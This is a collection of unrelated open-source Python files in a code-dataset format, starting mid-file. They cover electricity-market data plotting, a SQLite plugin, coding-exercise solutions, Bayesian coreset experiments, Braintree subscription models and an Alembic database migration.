geração das usinas não simuladas e, por isso, será ilustrado um exemplo deste caso.\nfrom inewave.newave import Sistema\n\narq_sistema = Sistema.read(\"./newave/sistema.dat\")\n\n# %%\n# A definição dos submercados é acessível através do bloco que define os custos de déficit\narq_sistema.custo_deficit.iloc[:, :4]\n\n# %%\n# As informações de mercado de energia são reunidas em uma única propriedade\n# e esta pode ser alterada livremente\narq_sistema.mercado_energia.iloc[:, :4]\n\n\n# %%\n# Será feito um gráfico de área empilhado. 
Para isso, serão geradas algumas variáveis auxiliares.\ndf = arq_sistema.mercado_energia\nanos = df[\"ano\"].unique().tolist()\nano_inicio = anos[0]\nano_fim = anos[-1]\nx = pd.date_range(\n datetime(year=int(ano_inicio), month=1, day=1),\n datetime(year=int(ano_fim), month=12, day=1),\n freq=\"MS\",\n)\n\n# %%\n# Para a figura, são geradas as retas independentemente\nfig = go.Figure()\nfor submercado in df[\"submercado\"].unique():\n df_sbm = df.loc[df[\"submercado\"] == submercado].drop(\n columns=[\"submercado\", \"ano\"]\n )\n fig.add_trace(\n go.Scatter(\n x=x,\n y=df_sbm.to_numpy().flatten(),\n mode=\"lines\",\n stackgroup=\"one\",\n name=str(submercado),\n )\n )\n\nfig.update_xaxes(title=\"Data\")\nfig.update_yaxes(title=\"Mercado de Energia (MWmes)\")\nfig.update_layout(legend_title_text=\"Submercado\")\nfig\n\n# %%\n# É possível realizar edições livres na propriedade do arquivo, para geração de estudos\n# de sensibilidades. Por exemplo, é possível aumentar a carga do submercado NORDESTE\n# em 30% e conferir o efeito na operação com a execução do modelo.\ncolunas_meses = arq_sistema.mercado_energia.columns.tolist()[2:]\narq_sistema.mercado_energia.loc[\n arq_sistema.mercado_energia[\"submercado\"] == 3, colunas_meses\n] *= 1.3\n\nfrom io import StringIO\n\nconteudo_sistema = StringIO()\narq_sistema.write(conteudo_sistema)\nprint(conteudo_sistema.getvalue())\n","repo_name":"rjmalves/inewave","sub_path":"examples/plot_sistema.py","file_name":"plot_sistema.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"pt","doc_type":"code","stars":6,"dataset":"github-code","pt":"85"} +{"seq_id":"72088624598","text":"\"\"\"\nAn example database plugin.\nYou can use whatever database you like\nor even store pickled python objects.\n\nDo not forget about connection timeouts when connecting\nto external databases.\n\"\"\"\n\nfrom nodeforge.PluginUtils import *\nimport sqlite3\n\nclass Main(Plugin):\n\n def onLoad(self):\n \"\"\"\n Load the sql file.\n \"\"\"\n \n def newconnection():\n connection = sqlite3.connect('db.sql', isolation_level = None)\n connection.text_factory = str\n return connection\n \n # use these in the main thread\n self.connection = newconnection()\n self.cursor = self.connection.cursor()\n \n # call this to get a new cursor for a different thread to use\n self.newcursor = lambda: newconnection().cursor()\n \n \n self.cursor.execute(\n \"CREATE TABLE IF NOT EXISTS users (op NUMERIC, name PRIMARY KEY, quit REAL,\\\n lastchat TEXT, lastchattime REAL, email NONE, banned NUMERIC)\")","repo_name":"impredicative/nodeforge","sub_path":"src/plugins/dc/Database/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74469199319","text":"# # maxamize it\n# 3 1000\n# 2 5 4\n# 3 7 8 9\n# 5 5 7 8 9 10\n\n# name, *line = input().split()\n# scores = list(map(float, line))\n\n# x, y = map(int, raw_input().split()) input in one line\n\n\nimport itertools\n\nk, m = map(int, input().strip().split(' '))\na = []\nfor i in range(k):\n t = list(map(int, input().split()))\n a.append(t)\n\n# print(a)\n\nmx = 0\nfor tp in itertools.product(*a):\n print(tp)\n res = sum([x**2 for x in tp]) % m\n print(res)\n if res > mx:\n mx = res\n\nprint(mx)\n","repo_name":"bhanupratapsinghcs/python","sub_path":"Hacker Rank Python 
problems/maximize.py","file_name":"maximize.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"23292771318","text":"# This is program is about create the dict for text\nimport pycantonese as pc\nimport re\nclass Linguistic_DICT(object):\n \"\"\"\n Read different kinds of dict\n \"\"\"\n def get_POS_dict(self, dict_file):\n _dict = {}\n try:\n with open(dict_file, 'r') as f:\n for line in f:\n (num, pos) = line.strip().split(' ')\n _dict[pos] = num\n except:\n print(\"Error: Fail to open %s\" % dict_file)\n return _dict\n\n def get_phone_dict(self, dict_file):\n # pdb.set_trace()\n # pdb.set_trace()\n _dict = {}\n try:\n with open(dict_file, 'r') as f:\n for line in f:\n (phone, num) = line.strip().split(' ')\n _dict[phone] = num\n except:\n print(\"Error: Fail to open %s\" % dict_file)\n return _dict\n\n def search_single_char(self, word_dict, m_char):\n # search single char in word dict\n for key, value in word_dict.items():\n if m_char in key:\n m_index = list(key).index(m_char)\n jp = pc.parse_jyutping(value)\n jp_index = ''.join(list(jp[m_index]))\n return jp_index\n def get_lexicon_dict(self, lexicon_path):\n with open(lexicon_path, 'r') as fid:\n lex_lines = fid.readlines()\n _dict = {}\n for tline in lex_lines:\n tline = tline.strip()\n lex_list = re.split('\\s+',tline)\n _dict[lex_list[0]] = lex_list[1:]\n return _dict","repo_name":"patrick-g-zhang/cFrontEnd","sub_path":"src/linguistic_dict.py","file_name":"linguistic_dict.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"1467636630","text":"#!/usr/bin/env python3\nimport logging\nimport random\n\nimport numpy as np\nfrom scipy.optimize import minimize\nimport matplotlib.pyplot as plt\nfrom bayesiancoresets import HilbertCoreset\nfrom bayesiancoresets import BlackBoxProjector\nfrom gaussian import GaussianDistribution\nfrom utils import get_cfg_data\nimport examples.common.model_lr as m_lr\nimport scipy.linalg as sl\nimport bayesiancoresets.util as bc_util\nimport os, sys\nimport argparse\nimport time\nimport bayesiancoresets as bc\n# make it so we can import models/etc from parent folder\nsys.path.insert(1, os.path.join(sys.path[0], '../..'))\nsys.path.insert(1, os.path.join(sys.path[0], '../common'))\nimport examples.common.model_gaussian as gaussian\n\n\nclass SimpleLRBayesianCoreset(object):\n\n def __init__(self, gd_distribution):\n self.coreset_threshold = 200\n self.gd_distribution = gd_distribution\n logging.info('Construct a simple bayesian coreset!')\n\n def construct_bayesian_coreset(self):\n Z = self.gd_distribution\n # Here we use the laplace approximation of the posterior\n # first, optimize the log joint to find the mode:\n res = minimize(lambda mu: -m_lr.log_joint(Z, mu, np.ones(Z.shape[0]))[0], Z.mean(axis=0),\n jac=lambda mu: -m_lr.grad_th_log_joint(Z, mu, np.ones(Z.shape[0]))[0, :])\n # then find a quadratic expansion around the mode, and assume the distribution is Gaussian\n mu = res.x\n cov = -np.linalg.inv(m_lr.hess_th_log_joint(Z, mu, np.ones(Z.shape[0]))[0, :, :])\n projection_dim = 500 # random projection dimension\n sampler = lambda sz, w, p: np.atleast_2d(np.random.multivariate_normal(mu, cov, sz))\n projector = BlackBoxProjector(sampler, projection_dim, m_lr.log_likelihood)\n coreset = HilbertCoreset(Z, projector)\n coreset.build(self.coreset_threshold) # build the coreset to size M with at most M 
iterations\n wts, pts, idcs = coreset.get()\n plt.scatter(self.gd_distribution[idcs][:, 0], self.gd_distribution[idcs][:, 1], c='r', marker='*')\n plt.title('Bayesian coreset', fontsize='xx-large', fontweight='heavy')\n plt.show()\n return idcs\n\n\nclass BayesianCoreset(object):\n\n def __init__(self):\n cfg = get_cfg_data()\n self.gd_obj = GaussianDistribution(cfg['space-version']['type'], cfg['guassian-params']['items'])\n self.g_params_list = cfg['guassian-params']['items']\n logging.info('Construct a Gaussian bayesian coreset!')\n\n def construct_bayesian_coreset(self, distribution, arguments, distribution_type, gm_result):\n #######################################\n #######################################\n ## Step 0: Setup\n #######################################\n #######################################\n np.random.seed(arguments.trial)\n bc_util.set_verbosity(arguments.verbosity)\n Ms = arguments.coreset_size_max\n # w = []\n # p = []\n\n final_coreset_points = []\n if distribution_type == 'guassian':\n last_index = 0\n for g_param in self.g_params_list:\n loc_data = np.array([float(val) for val in g_param['loc'].split(' ')])\n scale_data = np.array([float(val) for val in g_param['scale'].split(' ')])\n size_data = [int(val) for val in g_param['size'].split(' ')]\n #######################################\n #######################################\n ## Step 1: Generate a Synthetic Dataset\n #######################################\n #######################################\n mu0 = np.array(loc_data)\n Sig0 = np.array([\n [scale_data[0], 0],\n [0, scale_data[1]]\n ])\n Sig = np.array([\n [scale_data[0], 0],\n [0, scale_data[1]]\n ])\n\n # these are computed\n Sig0inv = np.linalg.inv(Sig0)\n Siginv = np.linalg.inv(Sig)\n LSigInv = np.linalg.cholesky(Siginv) # Siginv = LL^T, L Lower tri\n USig = sl.solve_triangular(\n LSigInv, np.eye(LSigInv.shape[0]), lower=True, overwrite_b=True, check_finite=False).T # Sig = UU^T, U upper tri\n # th = np.ones(arguments.data_dim)\n th = np.array(loc_data)\n logdetSig = np.linalg.slogdet(Sig)[1]\n #######################################\n #######################################\n ## Step 2: Calculate Likelihoods/Projectors\n #######################################\n #######################################\n # print('Computing true posterior')\n start_index = last_index\n end_index = last_index + size_data[0]\n x = distribution[start_index: end_index]\n last_index += size_data[0]\n # x = np.random.multivariate_normal(th, Sig, arguments.data_num)\n mup, USigp, LSigpInv = gaussian.weighted_post(mu0, Sig0inv, Siginv, x, np.ones(x.shape[0]))\n Sigp = USigp.dot(USigp.T)\n SigpInv = LSigpInv.dot(LSigpInv.T)\n\n sub_coreset = self._get_bayesian_sub_coreset(\n Siginv, logdetSig, mup, USigp, x, mu0, Sig0inv, LSigInv, Ms, arguments)\n final_coreset_points += sub_coreset\n else:\n _mean = gm_result[0][0]\n _cov = gm_result[1][0]\n mu0 = _mean\n Sig0 = _cov\n Sig = _cov\n # these are computed\n Sig0inv = np.linalg.inv(Sig0)\n Siginv = np.linalg.inv(Sig)\n LSigInv = np.linalg.cholesky(Siginv) # Siginv = LL^T, L Lower tri\n USig = sl.solve_triangular(\n LSigInv, np.eye(LSigInv.shape[0]), lower=True, overwrite_b=True,\n check_finite=False).T # Sig = UU^T, U upper tri\n # th = np.ones(arguments.data_dim)\n th = gm_result[0]\n logdetSig = np.linalg.slogdet(Sig)[1]\n #######################################\n #######################################\n ## Step 2: Calculate Likelihoods/Projectors\n #######################################\n 
#######################################\n # print('Computing true posterior')\n x = distribution\n mup, USigp, LSigpInv = gaussian.weighted_post(mu0, Sig0inv, Siginv, x, np.ones(x.shape[0]))\n Sigp = USigp.dot(USigp.T)\n SigpInv = LSigpInv.dot(LSigpInv.T)\n\n sub_coreset = self._get_bayesian_sub_coreset(\n Siginv, logdetSig, mup, USigp, x, mu0, Sig0inv, LSigInv, Ms, arguments)\n final_coreset_points += sub_coreset\n\n # num_diff = Ms - len(final_coreset_points)\n # random.choices(distribution, k=num_diff)\n for point in final_coreset_points:\n plt.scatter(\n point[0], point[1], c='r', marker='*'\n )\n plt.title('Bayesian coreset', fontsize='xx-large', fontweight='heavy')\n plt.show()\n return final_coreset_points\n\n def _get_bayesian_sub_coreset(self, Siginv, logdetSig, mup, USigp, x, mu0, Sig0inv, LSigInv, Ms, arguments):\n # create the log_likelihood function\n # print('Creating log-likelihood function')\n log_likelihood = lambda x, th: gaussian.log_likelihood(x, th, Siginv, logdetSig)\n\n # print('Creating gradient log-likelihood function')\n grad_log_likelihood = lambda x, th: gaussian.grad_x_log_likelihood(x, th, Siginv)\n\n # print('Creating tuned projector for Hilbert coreset construction')\n # create the sampler for the \"optimally-tuned\" Hilbert coreset\n sampler_optimal = lambda n, w, pts: mup + np.random.randn(n, mup.shape[0]).dot(USigp.T)\n prj_optimal = bc.BlackBoxProjector(sampler_optimal, arguments.proj_dim, log_likelihood, grad_log_likelihood)\n\n # print('Creating untuned projector for Hilbert coreset construction')\n # create the sampler for the \"realistically-tuned\" Hilbert coreset\n xhat = x[np.random.randint(0, x.shape[0], int(np.sqrt(x.shape[0]))), :]\n muhat, USigHat, LSigHatInv = gaussian.weighted_post(mu0, Sig0inv, Siginv, xhat, np.ones(xhat.shape[0]))\n sampler_realistic = lambda n, w, pts: muhat + np.random.randn(n, muhat.shape[0]).dot(USigHat.T)\n prj_realistic = bc.BlackBoxProjector(sampler_realistic, arguments.proj_dim, log_likelihood,\n grad_log_likelihood)\n\n # print('Creating black box projector')\n\n def sampler_w(n, wts, pts):\n if wts is None or pts is None or pts.shape[0] == 0:\n wts = np.zeros(1)\n pts = np.zeros((1, mu0.shape[0]))\n muw, USigw, _ = gaussian.weighted_post(mu0, Sig0inv, Siginv, pts, wts)\n return muw + np.random.randn(n, muw.shape[0]).dot(USigw.T)\n\n prj_bb = bc.BlackBoxProjector(sampler_w, arguments.proj_dim, log_likelihood, grad_log_likelihood)\n\n # print('Creating exact projectors')\n\n # TODO need to fix all the transposes in this...\n class GaussianProjector(bc.Projector):\n def project(self, pts, grad=False):\n nu = (pts - self.muw).dot(LSigInv)\n PsiL = LSigInv.T.dot(self.USigw)\n Psi = PsiL.dot(PsiL.T)\n nu = np.hstack(\n (nu.dot(PsiL),\n np.sqrt(0.5 * np.trace(np.dot(Psi.T, Psi))) * np.ones(nu.shape[0])[:, np.newaxis]))\n nu *= np.sqrt(nu.shape[1])\n if not grad:\n return nu\n else:\n gnu = np.hstack((LSigInv.dot(PsiL), np.zeros(pts.shape[1])[:, np.newaxis])).T\n gnu = np.tile(gnu, (pts.shape[0], 1, 1))\n gnu *= np.sqrt(gnu.shape[1])\n return nu, gnu\n\n def update(self, wts=None, pts=None):\n if wts is None or pts is None or pts.shape[0] == 0:\n wts = np.zeros(1)\n pts = np.zeros((1, mu0.shape[0]))\n self.muw, self.USigw, self.LSigwInv = gaussian.weighted_post(mu0, Sig0inv, Siginv, pts, wts)\n\n prj_optimal_exact = GaussianProjector()\n prj_optimal_exact.update(np.ones(x.shape[0]), x)\n prj_realistic_exact = GaussianProjector()\n prj_realistic_exact.update(np.ones(xhat.shape[0]), xhat)\n\n 
#######################################\n #######################################\n ## Step 3: Construct Coreset\n #######################################\n #######################################\n\n # print('Creating coreset construction objects')\n # create coreset construction objects\n sparsevi_exact = bc.SparseVICoreset(x, GaussianProjector(), opt_itrs=arguments.opt_itrs,\n step_sched=eval(arguments.step_sched))\n sparsevi = bc.SparseVICoreset(x, prj_bb, opt_itrs=arguments.opt_itrs, step_sched=eval(arguments.step_sched))\n giga_optimal = bc.HilbertCoreset(x, prj_optimal)\n giga_optimal_exact = bc.HilbertCoreset(x, prj_optimal_exact)\n giga_realistic = bc.HilbertCoreset(x, prj_realistic)\n giga_realistic_exact = bc.HilbertCoreset(x, prj_realistic_exact)\n unif = bc.UniformSamplingCoreset(x)\n\n algs = {'SVI-EXACT': sparsevi_exact,\n 'SVI': sparsevi,\n 'GIGA-OPT': giga_optimal,\n 'GIGA-OPT-EXACT': giga_optimal_exact,\n 'GIGA-REAL': giga_realistic,\n 'GIGA-REAL-EXACT': giga_realistic_exact,\n 'US': unif}\n\n alg = algs[arguments.alg]\n # print('Building coreset')\n t_build = 0\n # print('M = ' + str(Ms) + ': coreset construction, ' + arguments.alg + ' ' + str(arguments.trial))\n t0 = time.process_time()\n itrs = Ms\n alg.build(itrs)\n t_build += time.process_time() - t0\n wts, pts, idcs = alg.get()\n # store weights/pts/runtime\n # w.append(wts)\n # p.append(pts)\n sub_coreset = [x[idx] for idx in idcs]\n return sub_coreset\n\n def get_arguments(self, bc_obj, data_num, point_num=100):\n parser = argparse.ArgumentParser(\n description=\"Runs Riemannian linear regression (employing coreset contruction) on the specified dataset\")\n subparsers = parser.add_subparsers(help='sub-command help')\n run_subparser = subparsers.add_parser('run', help='Runs the main computational code')\n run_subparser.set_defaults(func=bc_obj.construct_bayesian_coreset)\n\n parser.add_argument('--data_num', type=int, default=data_num, help='Dataset size/number of examples')\n parser.add_argument('--data_dim', type=int, default=2,\n help=\"The dimension of the multivariate normal distribution to use for this experiment\")\n parser.add_argument('--alg', type=str, default='GIGA-OPT',\n choices=['SVI', 'SVI-EXACT', 'GIGA-OPT', 'GIGA-OPT-EXACT', 'GIGA-REAL', 'GIGA-REAL-EXACT',\n 'US'],\n help=\"The name of the coreset construction algorithm to use\")\n parser.add_argument(\"--proj_dim\", type=int, default=2000,\n help=\"The number of samples taken when discretizing log likelihoods for these experiments\")\n parser.add_argument('--coreset_size_max', type=int, default=point_num, help=\"The maximum coreset size to evaluate\")\n parser.add_argument('--opt_itrs', type=int, default=200,\n help=\"Number of optimization iterations (for methods that use iterative weight refinement)\")\n parser.add_argument('--step_sched', type=str, default=\"lambda i : 1./(1+i)\",\n help=\"Optimization step schedule (for methods that use iterative weight refinement); entered as a python lambda expression surrounded by quotes\")\n parser.add_argument('--trial', type=int, default=1,\n help=\"The trial number - used to initialize random number generation (for replicability)\")\n parser.add_argument('--verbosity', type=str, default=\"error\",\n choices=['error', 'warning', 'critical', 'info', 'debug'],\n help=\"The verbosity level.\")\n\n arguments = parser.parse_args()\n return arguments\n\n\nif __name__ == '__main__':\n bc_obj = BayesianCoreset()\n cfg = get_cfg_data()\n gd_obj = GaussianDistribution(cfg['space-version']['type'], 
cfg['guassian-params']['items'])\n distribution = gd_obj.get_guassian_distribution()\n gd_obj.display_gd_distribution(distribution, show=False, scatt=True)\n\n parser = argparse.ArgumentParser(\n description=\"Runs Riemannian linear regression (employing coreset contruction) on the specified dataset\")\n subparsers = parser.add_subparsers(help='sub-command help')\n run_subparser = subparsers.add_parser('run', help='Runs the main computational code')\n run_subparser.set_defaults(func=bc_obj.construct_bayesian_coreset)\n\n parser.add_argument('--data_num', type=int, default='6000', help='Dataset size/number of examples')\n parser.add_argument('--data_dim', type=int, default='2',\n help=\"The dimension of the multivariate normal distribution to use for this experiment\")\n parser.add_argument('--alg', type=str, default='GIGA-OPT',\n choices=['SVI', 'SVI-EXACT', 'GIGA-OPT', 'GIGA-OPT-EXACT', 'GIGA-REAL', 'GIGA-REAL-EXACT',\n 'US'],\n help=\"The name of the coreset construction algorithm to use\")\n parser.add_argument(\"--proj_dim\", type=int, default=2000,\n help=\"The number of samples taken when discretizing log likelihoods for these experiments\")\n parser.add_argument('--coreset_size_max', type=int, default=500, help=\"The maximum coreset size to evaluate\")\n parser.add_argument('--opt_itrs', type=int, default=200,\n help=\"Number of optimization iterations (for methods that use iterative weight refinement)\")\n parser.add_argument('--step_sched', type=str, default=\"lambda i : 1./(1+i)\",\n help=\"Optimization step schedule (for methods that use iterative weight refinement); entered as a python lambda expression surrounded by quotes\")\n parser.add_argument('--trial', type=int, default=1,\n help=\"The trial number - used to initialize random number generation (for replicability)\")\n parser.add_argument('--verbosity', type=str, default=\"error\",\n choices=['error', 'warning', 'critical', 'info', 'debug'],\n help=\"The verbosity level.\")\n\n arguments = parser.parse_args()\n\n print('coreset_size_max: ', arguments.coreset_size_max)\n\n results = bc_obj.construct_bayesian_coreset(distribution, arguments, 'guassian', None)\n print(results)\n","repo_name":"DLwbm123/grizz","sub_path":"survey/bayesian_coreset.py","file_name":"bayesian_coreset.py","file_ext":"py","file_size_in_byte":17255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7504061111","text":"from __future__ import annotations\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.db import models\n\nif settings.USE_PAYMENTS:\n import braintree\nelse:\n # hc.payments tests mock this object, so tests should\n # still be able to run:\n braintree = None\n\n\nADDRESS_KEYS = (\n \"company\",\n \"street_address\",\n \"extended_address\",\n \"locality\",\n \"region\",\n \"postal_code\",\n \"country_code_alpha2\",\n)\n\n\nclass SubscriptionManager(models.Manager):\n def for_user(self, user):\n sub, created = Subscription.objects.get_or_create(user_id=user.id)\n return sub\n\n def by_transaction(self, transaction_id):\n try:\n tx = braintree.Transaction.find(transaction_id)\n except braintree.exceptions.NotFoundError:\n return None, None\n\n try:\n sub = self.get(customer_id=tx.customer_details.id)\n except Subscription.DoesNotExist:\n return None, None\n\n return sub, tx\n\n def by_braintree_webhook(self, request):\n sig = str(request.POST[\"bt_signature\"])\n payload = str(request.POST[\"bt_payload\"])\n\n doc = 
braintree.WebhookNotification.parse(sig, payload)\n assert doc.kind == \"subscription_charged_successfully\"\n\n sub = self.get(subscription_id=doc.subscription.id)\n return sub, doc.subscription.transactions[0]\n\n\nclass Subscription(models.Model):\n user = models.OneToOneField(User, models.CASCADE, blank=True, null=True)\n customer_id = models.CharField(max_length=36, blank=True)\n payment_method_token = models.CharField(max_length=35, blank=True)\n subscription_id = models.CharField(max_length=10, blank=True)\n plan_id = models.CharField(max_length=10, blank=True)\n plan_name = models.CharField(max_length=50, blank=True)\n address_id = models.CharField(max_length=2, blank=True)\n send_invoices = models.BooleanField(default=True)\n invoice_email = models.EmailField(blank=True)\n\n objects = SubscriptionManager()\n\n @property\n def payment_method(self):\n if not self.subscription_id:\n return None\n\n if not hasattr(self, \"_pm\"):\n o = self._get_braintree_subscription()\n self._pm = braintree.PaymentMethod.find(o.payment_method_token)\n return self._pm\n\n @property\n def is_supporter(self):\n return self.plan_id in (\"S5\", \"S48\")\n\n @property\n def is_business(self):\n return self.plan_id in (\"P20\", \"Y192\")\n\n @property\n def is_business_plus(self):\n return self.plan_id in (\"P80\", \"Y768\")\n\n def is_annual(self):\n return self.plan_id in (\"S48\", \"Y192\", \"Y768\")\n\n def _get_braintree_subscription(self):\n if not hasattr(self, \"_sub\"):\n self._sub = braintree.Subscription.find(self.subscription_id)\n return self._sub\n\n def get_client_token(self):\n assert self.customer_id\n return braintree.ClientToken.generate({\"customer_id\": self.customer_id})\n\n def update_payment_method(self, nonce):\n assert self.subscription_id\n\n result = braintree.Subscription.update(\n self.subscription_id, {\"payment_method_nonce\": nonce}\n )\n\n if not result.is_success:\n return result\n\n def update_address(self, post_data):\n # Create customer record if it does not exist:\n if not self.customer_id:\n result = braintree.Customer.create({\"email\": self.user.email})\n if not result.is_success:\n return result\n\n self.customer_id = result.customer.id\n self.save()\n\n payload = {key: str(post_data.get(key)) for key in ADDRESS_KEYS}\n if self.address_id:\n result = braintree.Address.update(\n self.customer_id, self.address_id, payload\n )\n else:\n payload[\"customer_id\"] = self.customer_id\n result = braintree.Address.create(payload)\n if result.is_success:\n self.address_id = result.address.id\n self.save()\n\n if not result.is_success:\n return result\n\n def setup(self, plan_id, nonce):\n result = braintree.Subscription.create(\n {\"payment_method_nonce\": nonce, \"plan_id\": plan_id}\n )\n\n if result.is_success:\n self.subscription_id = result.subscription.id\n self.plan_id = plan_id\n if plan_id == \"P20\":\n self.plan_name = \"Business ($20 / month)\"\n elif plan_id == \"Y192\":\n self.plan_name = \"Business ($192 / year)\"\n elif plan_id == \"P80\":\n self.plan_name = \"Business Plus ($80 / month)\"\n elif plan_id == \"Y768\":\n self.plan_name = \"Business Plus ($768 / year)\"\n elif plan_id == \"S5\":\n self.plan_name = \"Supporter ($5 / month)\"\n elif plan_id == \"S48\":\n self.plan_name = \"Supporter ($48 / year)\"\n\n self.save()\n\n if not result.is_success:\n return result\n\n def cancel(self):\n if self.subscription_id:\n braintree.Subscription.cancel(self.subscription_id)\n self.subscription_id = \"\"\n\n self.plan_id = \"\"\n self.plan_name = \"\"\n 
self.save()\n\n def pm_is_card(self):\n pm = self.payment_method\n return isinstance(pm, braintree.credit_card.CreditCard)\n\n def pm_is_paypal(self):\n pm = self.payment_method\n return isinstance(pm, braintree.paypal_account.PayPalAccount)\n\n def next_billing_date(self):\n o = self._get_braintree_subscription()\n return o.next_billing_date\n\n @property\n def address(self):\n if not hasattr(self, \"_address\"):\n try:\n self._address = braintree.Address.find(\n self.customer_id, self.address_id\n )\n except braintree.exceptions.NotFoundError:\n self._address = None\n\n return self._address\n\n @property\n def transactions(self):\n if not hasattr(self, \"_tx\"):\n if not self.customer_id:\n self._tx = []\n else:\n self._tx = list(\n braintree.Transaction.search(\n braintree.TransactionSearch.customer_id == self.customer_id\n )\n )\n\n return self._tx\n","repo_name":"HEROEngineer/healthcheck","sub_path":"hc/payments/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6416,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"21860368011","text":"#!/usr/bin/env python\n# -*- coding:UTF-8 -*-\n# AUTHOR: Mythezone\n# DATE: 2020/01/05 Sun\n# TIME: 14:43:34\n\n# DESCRIPTION:\nimport os,sys,json,socket,time\n\n\ndef gen_msg(tp,idin,content):\n copy_content={}\n for key,value in content.items():\n copy_content[key]=value\n msg={\n \"type\":tp,\n \"id\":idin,\n \"content\":copy_content\n }\n return json.dumps(msg).encode()\n\ndef reg_msg(addr,idin):\n ip,port=addr\n content={\n \"ip\":ip,\n \"port\":port\n }\n return gen_msg(\"register\",idin,content)\n\ndef que_msg(solution,fitness,iteration,timecost,idin):\n content={\n \"solution\":solution,\n \"fitness\":fitness,\n \"iteration\":iteration,\n \"timecost\":timecost\n }\n return gen_msg(\"result\",idin,content)\n\ndef qued_msg(dict_result,idin):\n return gen_msg(\"result\",idin,dict_result)\n\ndef par_msg(msg,ecd=True):\n if ecd==True:\n d=json.loads(msg.decode())\n else:\n d=json.loads(msg)\n return d","repo_name":"mythezone/EC_demo","sub_path":"server/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"2674817260","text":"s1 = \"ab\"\ns2 = \"eidbaooo\"\n\ns1_len = len(s1)\ns2_len = len(s2)\nif s1_len > s2_len:\n print(False)\n\nmap1 = [0] * 26\nfor c in s1:\n map1[ord(c) - 97] += 1\n\nmap2 = [0] * 26\nfor i in range(s1_len):\n map2[ord(s2[i]) - 97] += 1\nif map1 == map2:\n print(True)\nfor i in range(s1_len, s2_len):\n map2[ord(s2[i]) - 97] += 1\n map2[ord(s2[i - s1_len]) - 97] -= 1\n if map1 == map2:\n print(True)\n\nprint(False)\n\n\n\n\n# right = 0\n# left = 0\n# s1_dic = dict()\n# s2_dic = dict()\n\n# for c1 in s1:\n# s1_dic[c1] = (s1_dic.get(c1, 0) + 1) \n# print(s1_dic)\n# while right < len(s2):\n# if s1_dic.get(s2[right]):\n# s2_dic[s2[right]] = (s2_dic.get(s2[right], 0) + 1)\n# i = 0\n# for k, v in s2_dic.items():\n# print(k, v)\n# if s1_dic.get(k, 0) != v:\n# break\n# i += 1\n# print(i)\n# if i == len(s2_dic) and i >= len(s1_dic):\n# print(True)\n# print(s2[left:right])\n\n# else:\n# left += 1\n# right += 1\n# print(s2_dic)","repo_name":"chi811008/leetcode","sub_path":"AlgorithemI/567-Permutation in String.py","file_name":"567-Permutation in String.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} 
+{"seq_id":"22411333715","text":"\"\"\"Configuração inicial do banco de dados\n\nRevision ID: c3a545577055\nRevises: \nCreate Date: 2018-01-23 18:11:19.302113\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c3a545577055'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('usuario',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('pis', sa.Integer(), nullable=True),\n sa.Column('nome', sa.String(length=64), nullable=True),\n sa.Column('email', sa.String(length=120), nullable=True),\n sa.Column('username', sa.String(length=120), nullable=True),\n sa.Column('password_hash', sa.String(length=128), nullable=True),\n sa.Column('last_seen', sa.DateTime(), nullable=True),\n sa.Column('perfil_colaborador', sa.String(length=15), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_usuario_email'), 'usuario', ['email'], unique=True)\n op.create_index(op.f('ix_usuario_nome'), 'usuario', ['nome'], unique=True)\n op.create_index(op.f('ix_usuario_pis'), 'usuario', ['pis'], unique=True)\n op.create_index(op.f('ix_usuario_username'), 'usuario', ['username'], unique=True)\n op.create_table('integracao',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('caminho', sa.String(length=240), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.Column('data_hora_ultimo_registro', sa.DateTime(), nullable=True),\n sa.Column('id_colaborador', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['id_colaborador'], ['usuario.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('ocorrencia',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('justificativa', sa.String(length=240), nullable=True),\n sa.Column('data_ocorrencia', sa.DateTime(), nullable=True),\n sa.Column('hora_inicio', sa.Integer(), nullable=True),\n sa.Column('hora_fim', sa.Integer(), nullable=True),\n sa.Column('id_colaborador', sa.Integer(), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['id_colaborador'], ['usuario.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('resposta',\n sa.Column('justificativa', sa.Integer(), nullable=False),\n sa.Column('resposta', sa.String(length=240), nullable=True),\n sa.Column('status', sa.Boolean(), nullable=True),\n sa.Column('id_gestor', sa.Integer(), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['id_gestor'], ['usuario.id'], ),\n sa.ForeignKeyConstraint(['justificativa'], ['ocorrencia.id'], ),\n sa.PrimaryKeyConstraint('justificativa')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
